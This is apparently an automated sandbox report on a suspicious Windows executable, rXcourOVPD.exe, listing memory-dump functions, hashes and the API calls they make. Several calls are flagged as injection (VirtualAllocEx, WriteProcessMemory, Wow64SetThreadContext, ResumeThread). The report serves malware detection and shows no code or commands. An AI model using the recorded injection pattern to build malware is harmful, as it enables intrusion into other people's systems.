Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0fccc7fdc1fdc023172c8bbd6ef9bb9e139a1900f7d325a475a3618cdcc1a8e
Instruction ID: 74ad7d1396f13021433509a2c6b9e213d6e8b1f331053f317022d87123507094
Opcode Fuzzy Hash: a0fccc7fdc1fdc023172c8bbd6ef9bb9e139a1900f7d325a475a3618cdcc1a8e
Instruction Fuzzy Hash: 0431EDB9C0434DCFEB00DFA8C854B9DBBF1AF46308F50419AC405EB265D779A94ACB51

Function 06F30410 Relevance: 1.6, APIs: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06F3311A,?,?,?,?,?), ref: 06F331BF

Memory Dump Source

Source File: 0000000F.00000002.1396493284.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f30000_rXcourOVPD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: db0bab0fe18496c1b0b6ca9898a2569c394fe25ccab91cd50286e38139ba74d4
Instruction ID: df45f05fa1dc56b7139f51831547f22a4c08037636c27fa76db95e77c8d43fbe
Opcode Fuzzy Hash: db0bab0fe18496c1b0b6ca9898a2569c394fe25ccab91cd50286e38139ba74d4
Instruction Fuzzy Hash: 573188B6900359AFDB50DFA9C844BEEBFF8EF48320F14801AE549A7260D7349940CFA5

Function 06FFC948 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FFC9E0

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a6e7c7327688954f2d4cd9b495defeaf02cc7b484990be8fb6c7b95077920e48
Instruction ID: 057f8b9885622d1f44486615de25b9d3ddb8035aa4a5d7dca46eb3354233169d
Opcode Fuzzy Hash: a6e7c7327688954f2d4cd9b495defeaf02cc7b484990be8fb6c7b95077920e48
Instruction Fuzzy Hash: A62146B1D003199FCB10DFA9C885BDEBBF4FF48314F10842AEA59A7250D7799945CBA1

Function 06F38E48 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F38EE7

Memory Dump Source

Source File: 0000000F.00000002.1396493284.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f30000_rXcourOVPD.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 587fc10a5b1da45ea0bcf50ea9acc700a898d018b2cff51dad6e8332201eec2b
Instruction ID: 610eef5304411610ffb42686a3af3fa4686fbf575c817b98f12bc6b6d2d307ce
Opcode Fuzzy Hash: 587fc10a5b1da45ea0bcf50ea9acc700a898d018b2cff51dad6e8332201eec2b
Instruction Fuzzy Hash: A431E2B5D003499FCB10CF9AD880ADEFBF4AB48310F14842AE819A7210D774A545CFA5

Function 06FFC950 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06FFC9E0

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bc4bd1eb3fc0cd38481788537e6bad0b8aae94ad65e559f6dc0c53c5a067f9d2
Instruction ID: b7bfdd2591d7fe588ae0fb6953c50c9f94759c50f728a322418f099fe5218ea6
Opcode Fuzzy Hash: bc4bd1eb3fc0cd38481788537e6bad0b8aae94ad65e559f6dc0c53c5a067f9d2
Instruction Fuzzy Hash: 162144B1D003199FCB10DFA9C881BEEBBF4FF48314F10842AE919A7250C7789944CBA0

Function 06F38E50 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 06F38EE7

Memory Dump Source

Source File: 0000000F.00000002.1396493284.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f30000_rXcourOVPD.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 4a1ec2e5cf4b36d536f223b3fce86288a24b530d2ebe7aafce1d7b6443f4b920
Instruction ID: cf77d2fdd24dfd0934df9b3e352b5a219103c9c6c579d412ffc3738f3d46a584
Opcode Fuzzy Hash: 4a1ec2e5cf4b36d536f223b3fce86288a24b530d2ebe7aafce1d7b6443f4b920
Instruction Fuzzy Hash: 4321CEB5D003499FDB10CF9AD884AAEFBF5FB48320F14842AE819A7210D775A944CFA4

Function 06FFC7B1 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FFC836

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b3c5301e2bccf7ec397dc27fca008f518de7d023b6a394834dac9ddac6c95830
Instruction ID: 631ca2785222548482f768600feb36d70912ba28110f58426b5c72aa86d851ef
Opcode Fuzzy Hash: b3c5301e2bccf7ec397dc27fca008f518de7d023b6a394834dac9ddac6c95830
Instruction Fuzzy Hash: 572168B1D042089FCB10DFAAC4857EEBBF4EF48324F54842AD519B7241D7789945CFA0

Function 06FFCA38 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FFCAC0

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f23fb494fa6aed4785e104093e2f4e3e3de87c86841531ec20d76c3c3a997463
Instruction ID: b90499d752b868a72b918ed238f81c97803821f373aad03f238b9a39e0544cc9
Opcode Fuzzy Hash: f23fb494fa6aed4785e104093e2f4e3e3de87c86841531ec20d76c3c3a997463
Instruction Fuzzy Hash: 11214AB1D003599FCB10DFA9C841ADEFBF4FF48310F108429E519A3250D7359545CBA0

Function 028FCA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD366,?,?,?,?,?), ref: 028FD427

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2ce158100aa2fd5b611d67dd7dd52b965c531cbdad96e3ad0694fc74c27c8f2c
Instruction ID: a8bb9a22a8f0c828fbad7294b071d99d2e24cc37982a1794083cb597041b5e8c
Opcode Fuzzy Hash: 2ce158100aa2fd5b611d67dd7dd52b965c531cbdad96e3ad0694fc74c27c8f2c
Instruction Fuzzy Hash: 2321E5B9900248DFDB50DFAAD584ADEFBF4EB48314F14801AEA18B7310D374A944CFA4

Function 028FD398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,028FD366,?,?,?,?,?), ref: 028FD427

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 12f0c26442ad50cf2be654d92574d1085fd25f8db1a4e0fbeac3db79b1faeefa
Instruction ID: 49b904e164f513e79db9b7daa74481abc3a1140ff42982e40cffed42c02a49ec
Opcode Fuzzy Hash: 12f0c26442ad50cf2be654d92574d1085fd25f8db1a4e0fbeac3db79b1faeefa
Instruction Fuzzy Hash: 6F21E3B59002499FDB10CFAAD585ADEBFF4EB48314F14801AE918B7350D378A945CFA5

Function 06FFC7B8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06FFC836

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 15b287ac359e0fea631ce0402296d8a23c3b716698aa8c1c576d2a11abd10fe7
Instruction ID: b341375cd825f4de2bbfda4c33730464e7c9fe6696aca32f107a6a09c493c4d4
Opcode Fuzzy Hash: 15b287ac359e0fea631ce0402296d8a23c3b716698aa8c1c576d2a11abd10fe7
Instruction Fuzzy Hash: 2F213571D042098FDB50DFAAC485BEEBBF4EF88324F54842AD519A7240D778A945CFA0

Function 06FFCA40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06FFCAC0

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 322a02ce38947c8cd86202289868caa7c422cb9e45bd753c00e374a0ad9c6318
Instruction ID: e414c332ce940fa4d836e1adf37c670aa0f6a3942897037ce262f283d2d86f6b
Opcode Fuzzy Hash: 322a02ce38947c8cd86202289868caa7c422cb9e45bd753c00e374a0ad9c6318
Instruction Fuzzy Hash: EA2128B1D002599FCB10DFAAC881AEEFBF5FF48310F50842AE519A7250D779A945CBA4

Function 028FB159 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028FB126

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 088a49c9fc4ba3a86d41bb55913ac943cd96e7c4391611fa96e5ea1ac668263d
Instruction ID: b86238eb7e482e6fc07d0e9db7265c845aa8eaed84e738ea2e58e08cca1ee6e4
Opcode Fuzzy Hash: 088a49c9fc4ba3a86d41bb55913ac943cd96e7c4391611fa96e5ea1ac668263d
Instruction Fuzzy Hash: 3411E77DA043048FE754EF5AD8007ABBBF5EFC9318F15846AD608E7251C7749845CBA1

Function 06FFC888 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FFC8FE

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a4c8da0cf305ff564b3b4bb86773cebb6089a36a856740beb47db52efdc5656d
Instruction ID: c013d3fb7995517525dd4b3edab87b12fcdf859f25123dd6d9a6e00c0ae1e741
Opcode Fuzzy Hash: a4c8da0cf305ff564b3b4bb86773cebb6089a36a856740beb47db52efdc5656d
Instruction Fuzzy Hash: F21156B2D002499FCB20DFAAC845AEFBFF5EF48324F108419E519A7250CB75A945CFA0

Function 06F3041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,06F3311A,?,?,?,?,?), ref: 06F331BF

Memory Dump Source

Source File: 0000000F.00000002.1396493284.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6f30000_rXcourOVPD.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 41b770f1eb827e13be8458aeabab9958c3b3ddeb9923c9c59cc3f096ea9bac47
Instruction ID: 334ee930deab848dc90086e05b892b155cea556b4315fbabf7546eb863871d53
Opcode Fuzzy Hash: 41b770f1eb827e13be8458aeabab9958c3b3ddeb9923c9c59cc3f096ea9bac47
Instruction Fuzzy Hash: 48116AB2C002499FDB10DFAAC844BEEBFF8EB48320F14841AE915A3210C375A950CFA4

Function 06FFC890 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06FFC8FE

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8687b6e5f797b7418651a71fc524bedc719cb478d12034ab4080493fd1c46c3c
Instruction ID: 20814e278e310c89c5956dcc5fa44f35e3effb7f0c15550c758b6b947d3c5cd5
Opcode Fuzzy Hash: 8687b6e5f797b7418651a71fc524bedc719cb478d12034ab4080493fd1c46c3c
Instruction Fuzzy Hash: F81126719002499FCB20DFAAC845AEFBFF5EF48324F108419E519A7250C775A944CFA0

Function 06FFC2C8 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FFC332

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: fe499a51a0f4d6a397c4f78da468baffac266e07290a67c875189f674cb0ace9
Instruction ID: 111845ea30bbca439544e339e4eb09977d3cbc2df84ecc47bf593383eb324ab2
Opcode Fuzzy Hash: fe499a51a0f4d6a397c4f78da468baffac266e07290a67c875189f674cb0ace9
Instruction Fuzzy Hash: 4F1146B1D002488BCB20DFAAC8457EEFBF4AB88324F10841AD519A7650C675A945CFA5

Function 06FFC2D0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06FFC332

Memory Dump Source

Source File: 0000000F.00000002.1396554480.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6ff0000_rXcourOVPD.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 5a01d5b476f72feff07df1207c81a5bc3d5749ad708f1678d738c09f5a31c9e6
Instruction ID: c825b3d2b52661f3c54b52986d91c423c6ed3503a55e994d48046b9e4ea603d9
Opcode Fuzzy Hash: 5a01d5b476f72feff07df1207c81a5bc3d5749ad708f1678d738c09f5a31c9e6
Instruction Fuzzy Hash: E31125B1D002488BCB20DFAAC8457EEFBF4AF88324F20841AD519A7250C679A945CFA5

Function 028FB0C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028FB126

Memory Dump Source

Source File: 0000000F.00000002.1391594030.00000000028F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_28f0000_rXcourOVPD.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c2368eff4d95caaaf8fc1d4b1062a4ce16e53ec757a16479f0fc26fa5cc7819c
Instruction ID: 5dcc6fc0d424067aa29b484b4619d873d0a08bc495cfbd28289d473dd6064df2
Opcode Fuzzy Hash: c2368eff4d95caaaf8fc1d4b1062a4ce16e53ec757a16479f0fc26fa5cc7819c
Instruction Fuzzy Hash: 2A110FB9C002498FCB10DF9AD844A9EFBF4AB88324F10841AD519B7610D379A545CFA1

Function 0B7D1270 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B7D12D5

Memory Dump Source

Source File: 0000000F.00000002.1397815671.000000000B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b7d0000_rXcourOVPD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9f47857fc93cd9d611268186800dc89345bf23209935c47b5f6a7335e7a3266f
Instruction ID: 6ff45c53ba4f6a8797749da964f539629c591ccd49a8b0087df3db0101e23582
Opcode Fuzzy Hash: 9f47857fc93cd9d611268186800dc89345bf23209935c47b5f6a7335e7a3266f
Instruction Fuzzy Hash: EF1103B58003499FCB10DF9AD885BDEFBF8EB48324F108459E518B3600C379A644CFA5

Function 0B7D1278 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0B7D12D5

Memory Dump Source

Source File: 0000000F.00000002.1397815671.000000000B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B7D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b7d0000_rXcourOVPD.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 617ecabf4be299ad97cf6eab1fd641eee225972c6d84c124e09ccdd55944e465
Instruction ID: 1944e23c07d45ca4aa4af4887db3e9b7a669caecdd773c8ed642ce333c90bc26
Opcode Fuzzy Hash: 617ecabf4be299ad97cf6eab1fd641eee225972c6d84c124e09ccdd55944e465
Instruction Fuzzy Hash: 0211D0B58003499FDB10DF9AD885BDEFBF8EB48324F10845AE518B7610D379A944CFA5

Function 0106D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391239736.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_106d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b806a2175970f3e69b863aaf4687e0fbfbd9d173ef2783c9c6f012a2f1fcf764
Instruction ID: 210e598a511f861055ffbf2f4f3752aafeefedc4395c73d85df13c99eb210447
Opcode Fuzzy Hash: b806a2175970f3e69b863aaf4687e0fbfbd9d173ef2783c9c6f012a2f1fcf764
Instruction Fuzzy Hash: BB213771604240DFDB05DF58D9C0F2ABFA9FB88318F24C5A9E9C90B656C336D456CBA1

Function 0106D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391239736.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_106d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dafeacb310361d9d9a938326357c6edabf1299f84f7c311eff0cd040e368efa
Instruction ID: 337b40a09292a3ac68e6d84e2d5f0c0402c5ffa6194704c32acd3299059850d8
Opcode Fuzzy Hash: 6dafeacb310361d9d9a938326357c6edabf1299f84f7c311eff0cd040e368efa
Instruction Fuzzy Hash: 4D214871600244DFDB01DF48C9C0F5ABFA9FB88314F20C1A9E9890B25AC736E806C7A1

Function 0107D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391285640.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_107d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1ebcaa8526dc91caa577b86b82e111efde06d504e94c19ba5914658ce29c7c1
Instruction ID: 233e6b39a244e2a5fe8bb915403fd2df57fcd96e57fc7df7f9ec658ecf4d0025
Opcode Fuzzy Hash: c1ebcaa8526dc91caa577b86b82e111efde06d504e94c19ba5914658ce29c7c1
Instruction Fuzzy Hash: 66213471A04200EFDB01DF98D9C0B26BBA5FF98324F20C5ADE9894B256C336D407CB65

Function 0107D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391285640.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_107d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd96f58c23e6d744b0aa4eef16dcf503bc8cf31611bab34d8fc2b12f1d08ed5b
Instruction ID: 5ae67954145a01b4a0b30faf6833910ae66f0e5605f6813cf39b6a773b2a5968
Opcode Fuzzy Hash: dd96f58c23e6d744b0aa4eef16dcf503bc8cf31611bab34d8fc2b12f1d08ed5b
Instruction Fuzzy Hash: E8212575A04200DFCB16DF58D980B16BFA5EF84314F20C5ADF9890B256C336D407CBA5

Function 0107D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391285640.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_107d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3d9d360434546b7dff180bca7fd7ab5175cbaac332b26b27f878f4d300740c0
Instruction ID: 4183e62a629f74c0c02fe76063ae709178e227daa29d552b430ff8102e14b2d2
Opcode Fuzzy Hash: b3d9d360434546b7dff180bca7fd7ab5175cbaac332b26b27f878f4d300740c0
Instruction Fuzzy Hash: 792195755093808FDB13CF64D594715BFB1EF46214F29C5DAD8898F267C33A980ACBA2

Function 0106D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391239736.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_106d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: 27f0f8a616c9962eca4e94d7ea196aa45fad981fb0b9ad681e28c52bf9f38f59
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: D5110372504240CFDB02CF44D5C4B56BFB1FB84324F24C2A9D9890B257C33AE85ACBA1

Function 0106D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391239736.000000000106D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0106D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_106d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: f73bf098614314ec85466455c28d484e6c8ead339a4e92cee7886eb7e91b5b42
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: 4811D376504280CFDB16CF54D5C4B16BFB1FB84314F24C6A9D9890B657C336D45ACBA1

Function 0107D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1391285640.000000000107D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0107D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_107d000_rXcourOVPD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction ID: e2b6858d148718e87b5c470a17f6fa4299b030598192b3c3e192e4eef75b738e
Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction Fuzzy Hash: EA11BB75904280DFDB02CF54C5C4B15BFA1FF84224F28C6A9D8894B296C33AD40BCB61

Analysis Process: rXcourOVPD.exePID: 6976, Parent PID: 6576COMMON

Execution Graph

Execution Coverage:	15.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	116
Total number of Limit Nodes:	15

Executed Functions

Function 00E46730 Relevance: 5.4, Strings: 4, Instructions: 441
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o_q, xrefs: 00E4697A
,cq, xrefs: 00E469F2
(o_q, xrefs: 00E46988
,cq, xrefs: 00E46A00

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: (o_q$(o_q$,cq$,cq
API String ID: 0-196421762
Opcode ID: c1a7f73272f6ce9815517dc0af36e705557e7710fdfc4d7f598acd2560bdf385
Instruction ID: 242847018388dff25b78169109a935fcee5a33f5021bd7db85f4ac93938e74c1
Opcode Fuzzy Hash: c1a7f73272f6ce9815517dc0af36e705557e7710fdfc4d7f598acd2560bdf385
Instruction Fuzzy Hash: D2024C70A00219DFCB14CFA9D984AADBBB2FF8A304F15946AE445FB261D734DD41CB52

Function 00E4BEB0 Relevance: 4.0, Strings: 3, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 00E4BE38
PH_q, xrefs: 00E4C118
PH_q, xrefs: 00E4C107

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: PH_q$PH_q$PH_q
API String ID: 0-551984707
Opcode ID: 1319f634c8c7945add037c3ae268e77df01e155807d7a3e45a53a3791b80d9b8
Instruction ID: 0c3781728de201e7bed9aa646b3fea2f8bdccc9ccc74423fea6e553837292cbe
Opcode Fuzzy Hash: 1319f634c8c7945add037c3ae268e77df01e155807d7a3e45a53a3791b80d9b8
Instruction Fuzzy Hash: 7291F774E01208DFDB54DFAAD894A9DBBF2BF89314F249069E409BB365DB305942CF10

Function 00E497E8 Relevance: 3.4, Strings: 2, Instructions: 898COMMON

Download Yara Rule

Strings

4'_q, xrefs: 00E4A273
(o_q, xrefs: 00E49C78

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: (o_q$4'_q
API String ID: 0-2938337118
Opcode ID: c4f0b8d5777f8d89cd577ca39083d408dc7f41d2907c2a58313f768ae3740c8b
Instruction ID: 46064ebea27318dfe1668e4723ac6227038d3422e74ed6ea00deb8c9f6419318
Opcode Fuzzy Hash: c4f0b8d5777f8d89cd577ca39083d408dc7f41d2907c2a58313f768ae3740c8b
Instruction Fuzzy Hash: F4829074A40209DFCB15CF68D884AAEBBF2FF88314F159569E805AB3A2D730ED41CB51

Function 00E46108 Relevance: 3.0, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

(o_q, xrefs: 00E46642
Hcq, xrefs: 00E4650E

Memory Dump Source

Source File: 00000014.00000002.3760764846.0000000000E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e40000_rXcourOVPD.jbxd

Similarity

API ID:
String ID: (o_q$Hcq
